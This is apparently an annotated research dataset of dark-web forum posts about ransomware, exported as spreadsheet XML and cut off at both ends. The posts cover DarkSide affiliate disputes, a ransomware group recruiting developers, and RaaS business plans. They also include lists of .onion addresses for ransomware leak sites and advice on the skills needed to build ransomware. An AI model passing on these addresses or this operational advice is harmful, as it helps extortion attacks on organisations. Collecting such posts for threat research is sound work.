and the affiliate could use the deposit at xss to receive payment;;the second affiliate states that they had bitcoins left for them on the affiliate portal but had to rush to their relatives before they could claim them;;a third affiliate states that they too were a 'pentester' and had a ransom payment right before the darkside operation shut down. this affiliate states they sent proof to the xss admin;;a fourth affiliate states that they worked on corporate breaches but never received their 150,000 payment;;the fifth and final affiliate states that there was a $72,000 made to them on the affiliate portal but could not collect it before the operation closed due to health reasons;;;in the case of the first claim issued on march14, the forum administrator who is acting as arbitrator, approved compensation from darkside���s deposit. they also asked others to come forward if they have cause.;;four days later, the second claim appeared, followed by another three on march 19 and 20. none of these received a reply from the forum administrator.;;darkside became known in august 2020 and became one of the most prolific ransomware groups. in nine months, the operation made at least $90 million from ransoms.;;in just one week, the gang collected about $9 million from two attacks: colonial pipeline and german chemical distribution company brenntag.;;even if darkside shut down, there are still victims being extorted. affiliates have received the corresponding decryption keys to continue negotiations withm companies separately.</t>
  </si>
  <si>
    <t>Post describing how affiliates of the now closed darkside ransomware group have not been paid and seized bitcoin deposits</t>
  </si>
  <si>
    <t>21/05/2021 16:13</t>
  </si>
  <si>
    <t>5ad008b71be8f2524028</t>
  </si>
  <si>
    <t>DarkSide affiliates claim gang's bitcoins in deposit on hacker forum</t>
  </si>
  <si>
    <t>{'darkside': 6, 'ransomware': 4}</t>
  </si>
  <si>
    <t>the alleged darkside ransonware bitcoin wallet has been identified and associated clusters are now tagged in oxt.me.;;https://twitter.com/ergobtc/status/1393303121481371659</t>
  </si>
  <si>
    <t>Link to the darkside ransomware group bitcoin wallet</t>
  </si>
  <si>
    <t>15/05/2021 13:01</t>
  </si>
  <si>
    <t>a6843cd22815eedabf32</t>
  </si>
  <si>
    <t>DarkSide ransonware bitcoin wallet identified</t>
  </si>
  <si>
    <t>{'darkside': 1}</t>
  </si>
  <si>
    <t xml:space="preserve">the past year has been a transition period for dark web markets, as the illicit e-commerce hubs have been forced to adapt after big takedowns in 2019, according to a new report by europol.;;the lifecycles of individual marketplaces have shortened, and ���no clear dominant market has risen over the past year,��� according to european police agency���s annual internet organized crime threat assessment for 2020. the marketplaces still represent a ���growing threat,��� though, as a source for crime-oriented malicious software, drugs and other goods, the report says.;;after the 2019 takedown of deep dot web ��� a site that helped users navigate online markets for illegal drugs ��� dark web users began setting up other information hubs, including dark.fail and darknetlive.com, europol says. dread, a forum that has been around for about three years, also continues to operate.;;while criminals try to keep dark web markets as user-friendly as possible, they also appear to be cle brand to become too big.;;���short life cycles are making it difficult for law enforcement to investigate criminal cases,��� the report says. ���administrators seem to want to stay under the radar of law enforcement by knocking down markets and keeping market lifecycles low.��� (a force outside of law enforcement was weighing on them this year: in the first half of 2020, the coronavirus pandemic reportedly depressed some of the dark web trade.);;purchases are becoming harder to track, too. some marketplaces are wallet-less or user-less: they take their cut via a monthly commission or some other means, and in return they allow transactions directly between vendors and buyers.;;the evolution of cryptocurrency technology itself also is allowing for criminals to stay ahead of law enforcement, too. wallet services offer more privacy than ever before, and dark web markets have expanded the types of coins they will accept.;;���initially, darkweb markets relied solely on bitcoin. howehis has changed,��� europol says. ���an increasing number of markets are recognising the benefits of offering multiple coin alternatives, including litecoin, ethereum, monero, zcash and dash.���;;the report covers a wide range of cyberthreats beyond the dark web, including the proliferation of ransomware and ddos services, payment fraud, child exploitation and criminal opportunism around the covid-19 pandemic.;;big brother </t>
  </si>
  <si>
    <t>Debate stating that the dark web will remain despite recent instabillity</t>
  </si>
  <si>
    <t>/u/Biggie</t>
  </si>
  <si>
    <t>22d9c48057edcef7f584</t>
  </si>
  <si>
    <t>Darknet markets likely to continue despite exit scams and law enforcement takedowns</t>
  </si>
  <si>
    <t>48 days 15:20:00</t>
  </si>
  <si>
    <t>the comments on darknet-inside dont need a real e-mail, you can just enter one and comment. but behave. any fud, hatred or racism will be deleted, and if it comes that to many dont behave, i will lock the comments again. have a fair and open sight on things.;;daily news on darknet-inside;http://dinsid4aauy5y2g7nvfsg6kr4d5j26os26diehfnnxyzexgvsw5htdad.onion/en/;;die kommentare auf darknet-inside brauchen keine echte e-mail, ihr k��nnt einfach eine eingeben und kommentieren. aber benehmt euch. jegliches fud, hass oder rassismus wird gel��scht, und wenn es dazu kommt, dass sich zu viele nicht benehmen, werde ich die kommentare wieder sperren. habt eine faire und offene sicht auf die dinge.;;t��glich news auf darknet-inside;http://dinsid4aauy5y2g7nvfsg6kr4d5j26os26diehfnnxyzexgvsw</t>
  </si>
  <si>
    <t>Post about the the Folix-Ransomware</t>
  </si>
  <si>
    <t>/u/darknetinside</t>
  </si>
  <si>
    <t>/d/darknetinside</t>
  </si>
  <si>
    <t>7355ef6c01ef46884110</t>
  </si>
  <si>
    <t>Darknet-Inside News - Fonix-Ransomware, ChangeNow and open for Comments</t>
  </si>
  <si>
    <t>i noticed today that the darkside ransomware blog link isnt working, does anyone know information as to why or if there is a new onion link available?;thanks!!</t>
  </si>
  <si>
    <t>User asking for working darkside blog link</t>
  </si>
  <si>
    <t>15/05/2021 00:23</t>
  </si>
  <si>
    <t>e197d76490572c5f00a1</t>
  </si>
  <si>
    <t>Darkside Onion Link</t>
  </si>
  <si>
    <t>{'darkside': 1, 'ransomware': 1}</t>
  </si>
  <si>
    <t>https://krebsonsecurity.com/2021/05/darkside-ransomware-gang-quits-after-servers-bitcoin-stash-seized/;;found some information about my original post, i figured i would should share in case anyone else was curious;cheers!</t>
  </si>
  <si>
    <t>User sending information discussing the darkside ransomware group closure after bitcoing wallet as been seized</t>
  </si>
  <si>
    <t>15/05/2021 00:46</t>
  </si>
  <si>
    <t>anyone know the onion url for the darkside raas crew's blog?</t>
  </si>
  <si>
    <t>User asking for working darkside onion link</t>
  </si>
  <si>
    <t>/u/smashthestack</t>
  </si>
  <si>
    <t>13/05/2021 13:25</t>
  </si>
  <si>
    <t>c499ea94558eebd75fae</t>
  </si>
  <si>
    <t>Darkside blog url</t>
  </si>
  <si>
    <t>1 days 23:11:00</t>
  </si>
  <si>
    <t>{'darkside': 1, 'raas': 1}</t>
  </si>
  <si>
    <t>http://darksidc3iux462n6yunevoag52ntvwp6wulaz3zirkmh4cnz6hhj7id.onion/</t>
  </si>
  <si>
    <t>Link to darkside onion link</t>
  </si>
  <si>
    <t>/u/mercuri</t>
  </si>
  <si>
    <t>13/05/2021 17:16</t>
  </si>
  <si>
    <t>0 days 03:51:00</t>
  </si>
  <si>
    <t>they are rebranding, expect a new name</t>
  </si>
  <si>
    <t>User stating that darkside may rebrand</t>
  </si>
  <si>
    <t>15/05/2021 12:36</t>
  </si>
  <si>
    <t>0 days 12:26:00</t>
  </si>
  <si>
    <t>i have heard rumors about the darkside gang but who are they? beacuse i have no fucking clue.</t>
  </si>
  <si>
    <t>User asking who the darkside ransomware group is</t>
  </si>
  <si>
    <t>/u/itzcyder</t>
  </si>
  <si>
    <t>809dbba8c142ddec6cbd</t>
  </si>
  <si>
    <t>Darkside ransomware gang</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;in a 2017 deloitte survey, only 42% of respondents considered their institutions to be extremely or very effective at managing cybersecurity risk. the pandemic has certainly done nothing to alleviate these concerns. despite increased it security investments companies made in 2020 to deal with distributed it and work-from-home challenges, nearly 80% of senior it workers and it security leaders believe their organizations lack sufficient defenses against cyberattacks, according to idg.;;source: venturebeat;;unfortunately, the cybersecurity landscape is poised to become more treacherous with the emergence of ai-powered cyberattacks, which could enable cybercriminals to fly under the radar of conventional, rules-based detection tools. for example, when ai is thrown into the mix, ���fake email��� could become nearly indistinguishable from trusted contact messages. and deepfakes ��� media that takes a person in an existing image, audio recording, or video and repmeone else���s likeness using ai ��� could be employed to commit fraud, costing companies millions of dollars.;;the solution could lie in ���defensive ai,��� or self-learning algorithms that understand normal user, device, and system patterns in an organization and detect unusual activity without relying on historical data. but the road to widespread adoption could be long and winding as cybercriminals look to stay one step ahead of their targets.;;what are ai-powered cyberattacks?;;ai-powered cyberattacks are conventional cyberattacks augmented with ai and machine learning technologies. take phishing, for example ��� a type of social engineering where an attacker sends a message designed to trick a human into revealing sensitive information or installing malware. infused with ai, phishing messages can be personalized to target high-profile employees at enterprises (like members of the c-suite) in a practice known as ���spear phishing.���;;imagine an adversarial groupr send fake invoices claiming to come from familiar suppliers. sourcing a machine learning language model capable of generating convincing-sounding emails, the group could fine-tune a system to generate replies that adopt the tone and tenor of the impersonated sender and even make references to previous correspondences. that might sound far-fetched ��� but there���s already growing concern among academics that tools like gpt-3 could be co-opted to foment discord by spreading misinformation, disinformation, and outright lies.;;phishing emails need not be highly targeted to present a threat to organizations. even lazily crafted spear-phishing messages can see up to 40 times the click-through rate compared with boilerplate content, making ai tools that expedite their creation hugely valuable to hackers. beyond natural language generation, ai can be used to identify high-value targets within organizations from their company profiles and email signatures, or even based on their activity across social mncluding facebook, twitter, and linkedin.;;in an interview with cyberdefense company darktrace, ed green, principal digital architect at mclaren racing, noted that before the pandemic, the technology team at mclaren would encounter crude, brute-force password attacks that green likened to a ���machine-gunning��� of credentials. but in the past year, the attacks have become been tailored to focus on individuals, roles, or teams at overwhelming scale. ���everyone [is] moving very, very quickly,��� because ���you���ve got a limited amount of time to read and respond to data and then make adjustments,��� green said.;;phishing and spam are only the tip of the iceberg when it comes to ai-powered cyberattacks. for example, malware could be augmented with ai to more easily move through an organization, probing internal systems without giving itself away and analyzing network traffic to blend its own communications. ai-powered malware could also learn how to target particular ete list, implementing a self-destruct or self-pause mechanism to avoid detection by antimalware or sandboxing solutions.;;beyond this, ai-powered cyberattack software could learn from probes in a large botnet to arrive at the most effective forms of attack. and prior to an attack, probes could be used for reconnaissance, helping attackers decide if a company is worth targeting or monitoring the traffic to an infected node (e.g., a desktop pc, server, or internet of things device) to select valuable targets.;;according to a recently published darktrace whitepaper, context is one of the most valuable tools that ai brings to a cyber attacker���s arsenal. weaponized ai might be able to adapt to the environment it infects by learning from contextual information, targeting the weak points it discovers or mimicking trusted elements of a system to maximize the damage it causes.;;���instead of guessing during which times normal business operations are conducted, [malware] will learn it,��� darktracet hunting max heinemeyer writes. ���rather than guessing if an environment is using mostly windows machines or linux machines, or if twitter or instagram would be a better channel for steganographic, it will be able to gain an understanding of what communication is dominant in the target���s network and blend in with it.���;;this might give rise to what darktrace calls ���low-and-slow��� data exfiltration attacks, where malware learns to evade detection by taking actions too subtle for humans and traditional security tools to detect. with an understanding of the context of its target���s environment, the malware could use send a payload that changes in size dynamically, for example, based on the total bandwidth used by the infected machine.;;solutions;;businesses are increasingly placing their faith in defensive ai to combat the growing cyberthreats. known as an autonomous response, defensive ai can interrupt in-progress attacks without affecting day-to-day business. given  hasn���t encountered before, defensive ai can identify the novel and abnormal patterns of behavior and stop the ransomware ��� even if it isn���t associated with publicly known compromise indicators like blacklisted command-and-control domains or malware file hashes.;;ai can also improve threat hunting by integrating behavior analysis, developing profiles of apps and devices inside an organization���s network by analyzing data from endpoints. and it can provide insights into what configuration tweaks might improve infrastructure and software security, learning the patterns of network traffic and recommending policies.;;for example, vectra, a cybersecurity vendor, taps ai to alert it teams to anomalous behavior from compromised devices in network traffic metadata and other sources, automating cyberattack mitigation. vectra employs supervised machine learning techniques to train its threat detection models along with unsupervised techniques to identify attacks that haven���t been �s data scientists build and tune self-learning ai systems that complement the metadata with key security information.;;another vendor, safeguard cyber, leverages an ai-powered engine called threat cortex that detects and spotlights risks across different attack surfaces. threat cortex searches the dark web and deep web to surface attackers and risk events, automatically notifying stakeholders when an anomaly crops up. using safeguard cyber, admins can quarantine unauthorized data from leaving an organization or specific account. it allows them to lock down and revert compromised accounts back to an earlier, uncompromised state.;;according to a recent darktrace report, 44% of executives are assessing ai-enabled security systems, and 38% are deploying autonomous response technology. this agrees with findings from statista. in a 2019 analysis, that firm reported that around 80% of executives in the telecommunications industry believe their organization wouldn���t be able to respond to cyberattacks without ai.;;���machine learning has many implications for cybersecurity. unfortunately, this includes seasoned cyber attackers, who we presume will start to use this technology to protect their malicious infrastructure, improve malware they create and to find, and target vulnerabilities in company systems,��� slovakia-based cybersecurity company eset wrote in a 2018 whitepaper. ���the hype around the topics and growing number of news stories revolving around massive data leaks and cyberattacks fuels fears in company it departments of what is yet to come.���</t>
  </si>
  <si>
    <t xml:space="preserve">Post discussing the fact that a minority of people find their insitutions ineffective at managing cycbersecurity risk and how cybercrime including ransomware can use AI. </t>
  </si>
  <si>
    <t>20/06/2021 21:33</t>
  </si>
  <si>
    <t>4e852cf635dfd59c586c</t>
  </si>
  <si>
    <t>Dear Enterprise IT: Cybercriminals Use AI, Too</t>
  </si>
  <si>
    <t>hi there, i'm dadylovesweed07 founder/creator of the no mercy ransomware group.;no mercy ransomware group is a new group and stands apart from other groups out there with limited but skilled and knowledgeable members in the house.. and we are looking for some skilled developers/programmers who can code ransomwares and malwares for us..;;so what can we offer for your work?;- money!;;so let me tell you more about myself and our groups goal.;;starting with me.. i'm dadylovesweed07 with an experience of 5 to 5 and a half or 6 yrs in red teaming, social engineering, pentesting, reverse engineering, etc..;i started my career in hacking from a very young age and now it's been forever.;;about the groups goal:-;;this group only focuses on one thing.. and that's making money!;we do not target /attack hospitals or any other medical related organization as we truly understand the impact of it on peoples lives with the current on going pandemic situation .our goal is to make money not to take peoples lives. if the company/organization satisfies our need which is paying the ransom we hand over the decryption tool. there's nothing personal.. it's strictly business.;;how could i contact you?;- pm me. and i'll respond to you asap.;;have a great day!</t>
  </si>
  <si>
    <t>User promoting their ransomware (no mercy) and asking for developers</t>
  </si>
  <si>
    <t>/u/DadyLovesWeed07</t>
  </si>
  <si>
    <t>76dc0716dfdc44d4a966</t>
  </si>
  <si>
    <t>Developers /Programmers needed for Ransomware Group.</t>
  </si>
  <si>
    <t>6 days 08:02:00</t>
  </si>
  <si>
    <t>its good that you do not target medical organizations</t>
  </si>
  <si>
    <t>user expressing praise for a raas provider not targeting medical organisations</t>
  </si>
  <si>
    <t>/u/rocketthethinggoat</t>
  </si>
  <si>
    <t>yeah as we understand that people's lives matter even more than money :)</t>
  </si>
  <si>
    <t>raas provider expressing they do not targeting medical organisations</t>
  </si>
  <si>
    <t>0 days 21:44:00</t>
  </si>
  <si>
    <t>uh yeah... english language forums are typically not the kinda place you find these sorta things (think more vodka and beets if you know what i mean).;;questions:;;1) ok so you don't target medical facilities - what about government infrastructure?  defense contractors?  do you touch anything in cis region? (most ransomware steers clear of there b/c of reason above).;;2) do you copy the data before you encrypt it and threaten to release it publicly if they don't pay (like other groups have done?)  also how do you ensure that you encrypt any local backups being made of data?;;3) is this team directly deploying ransomware or instead doing a kind of ransomware-as-a-service model like others have adopted?;;4) do you have access to resilient (aka bulletproof) hosting providers for c2 servers?;;5) what os are you targeting?  are you looking to use mostly known but unpatched exploits or what?;;6) since you said you have experience reverse engineering - can you explain what how a rowhammer attack works to me and what software i might use to discover/debug one?  nothing personal, but you *say* you have a lot of experience, i guess i'd like to check a little bit for myself.  sorry for the quiz in advance.</t>
  </si>
  <si>
    <t>user asking for more informtation regarding the morallity of the no mercy ransomware creator.</t>
  </si>
  <si>
    <t>debate / information (request)</t>
  </si>
  <si>
    <t>/u/martinatchet</t>
  </si>
  <si>
    <t>1 days 12:42:00</t>
  </si>
  <si>
    <t>also i should clarify that i'm in security for my job too and typically reverse engineer shit like this - so sorry not actually planning on joining your clubhouse.  was just curious.</t>
  </si>
  <si>
    <t>edit:- i had answered all your question but don't know it wasn't posted. maybe due to my network issues or i don't know. so i'm answering/writing this once again.;;1st:- we might target govt infrastructures in the future.. that's the reason i didn't mention it. i'm not 100% sure about it but maybe in the future. but we'll make sure not to target major govt infrastructures as we all know what happened with revil and blackmatter.;;2nd:- we do copy their data before encrypting it. that's the business works.;;3rd:- directly deploying ransomware.. raas maybe in the future but as of now no!;;4th:- ofc we do have bulletproof hosting.;;5th:- windows server, esxi.;;6th:-  it's quite a big explanation. but i'll try writing it in short.. the rowhammer attack is unusual because it aims to cause "bit flips" by rapidly and repeatedly accessing data in one memory row on a ram chip to create an electrical charge that changes data stored in other addresses in an adjacent "memory row" on a chip.;;note:- i'm writing this in a bit hurry so really sorry if i missed something.</t>
  </si>
  <si>
    <t xml:space="preserve">Original raas porvider (no mercy) answering questions asked to them regarding their attack morallity </t>
  </si>
  <si>
    <t>15/11/2021 18:31</t>
  </si>
  <si>
    <t>1 days 11:00:00</t>
  </si>
  <si>
    <t>{'revil': 1, 'raas': 1}</t>
  </si>
  <si>
    <t>curious if anyone has any information on if revil was paid by kaseya or if they simply shut down to evade le. read today that kaseya was able to obtain a decryptor key from a third party,;any thoughts?</t>
  </si>
  <si>
    <t>question on whether kaseya paid revil after their attack or if they shut down to evade law enforcement</t>
  </si>
  <si>
    <t>23/07/2021 22:41</t>
  </si>
  <si>
    <t>4921a5bf9fb1c2c3b2e4</t>
  </si>
  <si>
    <t>Did REvil get paid?</t>
  </si>
  <si>
    <t>11 days 23:51:00</t>
  </si>
  <si>
    <t>{'revil': 1}</t>
  </si>
  <si>
    <t>they probably made a deal with le.</t>
  </si>
  <si>
    <t>Responce stating they believe they made a deal with law enforcement</t>
  </si>
  <si>
    <t>dopple: http://hpoo4dosa3x4ognfxpqcrjwnsigvslm7kv6hvmhh2yqczaxy3j6qnwad.onion;maze: mazenews.top;darkside: darksidedxcftmqa.onion;ako: http://37rckgo66iydpvgpwve7b2el5q2zhjw4tv4lmyewufnpx4lhkekxkoqd.onion;ragnar: http://p6o7m73ujalhgkiv.onion/;nefilim: http://hxt254aygrsziejn.onion/;clop: http://ekbgzchl6x2ias37.onion/;netwalker: http://rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion/blog;revil: http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion;sekhmet: http://sekhmetleaks.top/;conti: conti.news htcltkjqoitnez5slo7fvhiou5lbno5bwczu7il2hmfpkowwdpj3q2yd.onion;pysa: http://wqmfzni2nvbbpk25.onion/partners.html;suncrypt: http://nbzzb6sa6xuura2z.onion;;have anymore? add them here</t>
  </si>
  <si>
    <t>onion links to various ransomware groups</t>
  </si>
  <si>
    <t>/u/c0pay</t>
  </si>
  <si>
    <t>26/08/2020 20:20</t>
  </si>
  <si>
    <t>4296d39dce337fe4182a</t>
  </si>
  <si>
    <t>Different ransomware groups and their .onion or URLs for press releases</t>
  </si>
  <si>
    <t>6 days 09:24:00</t>
  </si>
  <si>
    <t>the revil one is intresting it's up0 and crew publicly extorting large corp's. cool</t>
  </si>
  <si>
    <t>curiosity for these onion links to various ransomware groups</t>
  </si>
  <si>
    <t>/u/Whereistheweed</t>
  </si>
  <si>
    <t>26/08/2020 20:33</t>
  </si>
  <si>
    <t>0 days 00:13:00</t>
  </si>
  <si>
    <t>avaddon: http://avaddongun7rngel.onion/</t>
  </si>
  <si>
    <t>/u/elektra</t>
  </si>
  <si>
    <t>30/08/2020 22:07</t>
  </si>
  <si>
    <t>4 days 01:34:00</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;the dark web/darknet continues to be an environment for bad actors to share stolen credentials and discuss successful attacks. in fact, in recent weeks, personal information from places ranging from education organizations to voter databases in the u.s. have been found exposed. although there have been big takedowns of cybercrime groups online, cybercriminals evolve to avoid detection.;;but just as there���s a lot of bad on the dark web, there is also good ��� mostly in the form of intel that can be used to help protect organizations from attacks.;;because they are so focused on doing what���s right, researchers often overlook additional rich sources of cyber-threat intelligence that attackers essentially hand out as they interact online. in other words: to defend as a good guy, you have to think like a bad guy. getting into an attacker���s head provides clues as to how and why they operate.;;understanding the darknet/dark web;;for general purposes, tand ���darknet��� are more or less interchangeable, but there are some nuanced differences. when people refer to the dark web, they���re usually talking about hacker sites on the internet that you can access from a regular web browser. when people talk about darknet, it means you need special software. the most common one is the tor browser, but there are others as well.;;diving into the darkness;;to gain insight into how hackers operate, it helps to explore their stomping grounds. a common data source for threat intelligence are attacker-run and torrent/onion forums, usually on the darknet, where hackers often discuss, purchase and sell malware, ransomware and denial-of-service offerings.;;for obvious reasons, many of these forums require researchers to jump through a significant number of hoops to access  them. some forums require payment of some kind; others require people to vouch for you as a real hacker. and sometimes, you have to prove your worthiness by demonstrating your ability to rity problem or create malicious software.;;most attackers on these forums aren���t just motivated by monetary gain. they���re also looking for some glory. they want to post and advertise their knowledge in forums that will have the most views, and many want to show off their skills. what they typically show off are frequent attacks targeting mass numbers of individuals and organizations rather than narrow, specific, targeted attacks. so, the techniques shared in these forums help defenders understand attacker culture and how to defend against frequent attacks.;;current trends;;attack forums enable researchers to understand what attackers find interesting. getting inside the mind of an attacker not only enables threat researchers to anticipate risks and the steps within an attack, but it also helps us to begin to profile certain cybercriminals. threat behaviors are a lot like fingerprints and can be very useful in uncovering and defending against certain threats.;;one trend in these attack forums n popular and churned up a lot of discussion over the past few months is security on various web meeting platforms. most these discussions have no malicious intent and are probably people just wanting to understand or discuss a specific topic. in some rare cases, however, it is clear that when an application is getting enough chatter, it is because attackers are starting to research vulnerabilities or test code.;;threat researchers also make use of text dumps that contain usernames, names, passwords and other information. this is often what happens to data when cybercriminals, or even people in your organization, have intentionally or inadvertently leaked passwords or other personally identifiable information (pii). this data, of course, can put your entire organization at risk. at the very least, organizations should be checking to see if they���ve been caught up in these types of credential packages and data leaks.;;re-stacking the odds;;cyberattackers are notoriously opportunistic, and they also likeag about their conquests. as threat researchers work hard to stay ahead of their adversaries, they often overlook key information within the dark web and darknet that could help them. examining hacker forums and text dumps are just two of the ways that researchers can glean valuable information that will help them protect the networks they are responsible for. for this reason, cybersecurity training for researchers needs to include methods of accessing the dark online world so the good guys can better understand how the bad guys operate and beat them at their own game.;;another key part of this ecosystem is the role of law enforcement. threat researchers can and should work with law-enforcement agencies to share threat information in a way that���s easy and accessible. this has to be a two-way street. tackling cybercrime can���t be resolved unilaterally by law enforcement alone; it���s a joint responsibility that requires trusted relationships to be fostered between the public a</t>
  </si>
  <si>
    <t>Post on how security engineers and law enforcement learn to think like cyber criminals in order to antisipate them (including ransomware)</t>
  </si>
  <si>
    <t>13/11/2020 21:49</t>
  </si>
  <si>
    <t>61c1f403d31aa31008e3</t>
  </si>
  <si>
    <t>Digging into the Dark Web: How Security Researchers Learn to Think Like the Bad Guys</t>
  </si>
  <si>
    <t>yes and no.;;cybercriminals in general definitely do, that term is pretty broad, so all those ransomware guys and everyone else are definitely getting hunted.;;the reason traditional fraudsters usually fly under the radar is usually because it's hard to prove. someone used someone elses credit card information to buy something that got sent to a house that wasn't theirs and you don't even have the item in his posession. a lot of this stuff is just hard to trace. not always, but sometimes cops are lazy and just want someone, so when you do something like a ppp loan in a drop's name and split the loan with him, they might not listen to his story and just book him since the evidence is on him and he's got half the cash.;;when an operation is big enough, it will begin to draw attention, especially if it "fucks with the wrong people" so to say. as mentioned, slilpp was seized. the thing is, there are far less fraudsters and far more scammers, so it also fucks with the perception. you feel like there's so many people roaming free but half of the fraudsters you interact with are only here to scam people for a $10 ebook.;;all in all though, while none of us can properly comment on what part of the "list" we're on, it is a fair argument that bad drug -&gt; death while fraud usually just means reversed transactions and the bank or government eating the loss.</t>
  </si>
  <si>
    <t>Post on whether law enforcement are focusing on any particular areas of cyber crime, this user states that ransomware is high on the list at this point</t>
  </si>
  <si>
    <t>/u/controlling</t>
  </si>
  <si>
    <t>24/06/2021 08:19</t>
  </si>
  <si>
    <t>514839c3fdfc4f14e9d1</t>
  </si>
  <si>
    <t>Do cybercriminals even see any kind of police attention?</t>
  </si>
  <si>
    <t>4 days 07:44:00</t>
  </si>
  <si>
    <t>dear hackers,;;small questions, when i want to write malware for windows, do i have to be on a windows machine, so i can use the libraries and api's?;;cuz for example when using c, you can't use the windows.h and other includes on linux.;;if what i'm saying is right, why is linux then " the chosen os " for hacking? is it cuz of the tools u get or because its open source?;;again my question is about writing and reverse engineering or building malware for windows.;;also does this count as well for mac os? like do i have to have a macbook so i can use their libraries or is it the same like linux?</t>
  </si>
  <si>
    <t>Questions on how to write malware on windows</t>
  </si>
  <si>
    <t>/u/kankerJustitie</t>
  </si>
  <si>
    <t>54b6fea6a7a24f7c40ba</t>
  </si>
  <si>
    <t>Do you need windows to code malware.</t>
  </si>
  <si>
    <t>23 days 06:25:00</t>
  </si>
  <si>
    <t>well if windows is your targeted audience then you'll at the very least need a vm running to test your exploits. i lot of exploits are actually coded in objective c in windows studio. you can find sources for ransomware in nice vsl packages</t>
  </si>
  <si>
    <t xml:space="preserve">User stating that it would be best to use virtual machienes to write and test ransomware </t>
  </si>
  <si>
    <t>/u/UnlimitedForgeries</t>
  </si>
  <si>
    <t>is it better to just rent ransomware or make one?;for example i found ranion ransomware (kniephs2r6nhxe7d.onion);if anyone tested it, please give review.;and if anyone wrote their own ransomware, tell me your story;;thanks</t>
  </si>
  <si>
    <t>User asking if it is better to rent ransomware (raas) or make one</t>
  </si>
  <si>
    <t>/u/N1x0</t>
  </si>
  <si>
    <t>98d5c0c3fd7f0012818a</t>
  </si>
  <si>
    <t>Do you recommend RaaS?</t>
  </si>
  <si>
    <t>6 days 06:34:00</t>
  </si>
  <si>
    <t>imo pipl who do ransomware are the scum. its the scummiest of all malware.;its the equivalent of someone just taking over ur  room or house. kicking u to the street. and then making you pay to get all the shit in ur house/ room to get it back.;;ik u dont care but theres my 2 cents.;;btw to make a good ransomware you gotta have a median to strong knowledge of encryption. one slip up could allow a researcher to make a public decryption exe.</t>
  </si>
  <si>
    <t>User expressing their distain for those who partake in ransomware</t>
  </si>
  <si>
    <t>/u/Netflix</t>
  </si>
  <si>
    <t>2 days 16:15:00</t>
  </si>
  <si>
    <t>woah;wake up, take a look around, everyone is stealing from everyone. ransomware, advertising, wars, local bussinesses - same game, different methods</t>
  </si>
  <si>
    <t>User disagreeing with the previous user, stating that it is no more imorral then legal buissness</t>
  </si>
  <si>
    <t>1 days 12:36:00</t>
  </si>
  <si>
    <t>sometimes, i think about making a raas. because then i would not have to spread around the malware myself, then i would simply have to code it and market it.;first things first i would want to learn about the assembly language and metamorphic coding. not just c++ programming. i would be making it to have it's own payment processor included(if possible), all the sql servers with the keys and possible other info, will be managed by myself or someone else. i also think that this will include a way to spread directly from a server. so all the clients will have to do is to include the link in the spam mail or possibly download it and upload it to their own website. i'll make it extremely user friendly, and it will include a forum to discuss the varies of things about ransomware and spreading. i will possibly be taking 30 % for the service and the rest will be paid to the clients, so this way there will be no fee. i would not want to charge them anything only when they make money from it. these few days i have really been considering this and going this way. :)</t>
  </si>
  <si>
    <t>User considering making and marketing their own raas in order to avoid the difficulty of speading it themselves</t>
  </si>
  <si>
    <t>/u/JohnDillinger</t>
  </si>
  <si>
    <t>2 days 01:43:00</t>
  </si>
  <si>
    <t>84b1ba3ee05a30d6e4af</t>
  </si>
  <si>
    <t>Do you recommend Ransomware as Service?</t>
  </si>
  <si>
    <t>11 days 12:46:00</t>
  </si>
  <si>
    <t>&gt;c# fud ransomware;&gt;c#;&gt;stub size: 250kb (lol);no. using a high level language for writing malware is a huge red flag. and the rest of their specs confirms it, there is nothing revolutionary there. i can't recommend any specific product but if you want bleeding edge stuff you need to go to russian language forums.;;edit: if you want to write your own ultimate ransomware learn (preferably in order):;;;general programming (start with python 3+ if you never programmed before, there are shit ton of tutorials and it's easy to learn);;c/c++;;x86-64 asm;;operating system design;;windows internals;;reverse engineering;;computer forensics;;cryptography engineering;;software design;;secure coding;;powershell (optional);if you want something just good enough, you can skip some of them. but you won't make a dent, you will only make some white hat newbie happy by providing him with an easily reversible stub. and maybe couple of thousand bucks because you are lucky.</t>
  </si>
  <si>
    <t>User providing resorces and recommending the original poster learns more about the theory first and profits are slim initially</t>
  </si>
  <si>
    <t>/u/ILoveBigDongs3000</t>
  </si>
  <si>
    <t>but if i would target some random users, not high profile servers, then does it really matter if someone will be able to create decrypter?;using better language would be useful for some serious encrypting of very valuable data, not some .jpgs and .txts of random windows user;so is c# enough for this?</t>
  </si>
  <si>
    <t>debate / education (request)</t>
  </si>
  <si>
    <t>0 days 08:28:00</t>
  </si>
  <si>
    <t>the problem is then you have to select your targets very carefully. if you are just scanning random ips hoping for a n-day exploit or easily crackable ssh/telnet ports it is most likely that you are going to hit a honeypot instead of a real target. this is how av companies find, reverse engineer and fingerprint malware and also most security researchers run honeypots hoping to catch yet another stuxnet so they can write a shiny blog post about it and become famous and get all the business opportunities coming their way. and once you are fingerprinted you are fucked without a proper crypter. and the random crypter you found in the public most likely will backdoor your stub without you being ever aware of it.;;here is an example of what happens when you are careless and pick shortcuts instead of time proven proper ways:;hxxp://archivecaslytosk.onion/4jizr</t>
  </si>
  <si>
    <t>User providing answers to original posters questions</t>
  </si>
  <si>
    <t>does anybody have link to gandcrab raas?</t>
  </si>
  <si>
    <t>User asking for gandcrab raas link</t>
  </si>
  <si>
    <t>5 days 16:17:00</t>
  </si>
  <si>
    <t>i was looking into getting a hacktown membership. i just want to do my due diligence and make sure it is not a scam.;;dose the membership include the keyloggers and rat software or are those extra once you join?;also i am hesitant about downloading stuff like that on my pc how do i know that there isnt malware in it and they wont steal all my info or ransomware my ass;;if you are a member can you share your experience with  hacktown;;;thank you in advance for your replies</t>
  </si>
  <si>
    <t>User interested in hacktown membership (educational resource) and asking people if it is authentic</t>
  </si>
  <si>
    <t>/u/ItsThatGuy</t>
  </si>
  <si>
    <t>e95060cd8762ee270848</t>
  </si>
  <si>
    <t>Does anyone have a Hacktown memebership - is it worth it?</t>
  </si>
  <si>
    <t>6 days 15:09:00</t>
  </si>
  <si>
    <t>no the membership not include any keylogger , rat , other malwares you will get the list of legit service list like ransomeware , malwares ,  keylogger , crypter and much more ........ (you have to purchase by your own )</t>
  </si>
  <si>
    <t>User expressing the authenticity of hackertown</t>
  </si>
  <si>
    <t xml:space="preserve">information (provider) </t>
  </si>
  <si>
    <t>/u/Cyberjagu</t>
  </si>
  <si>
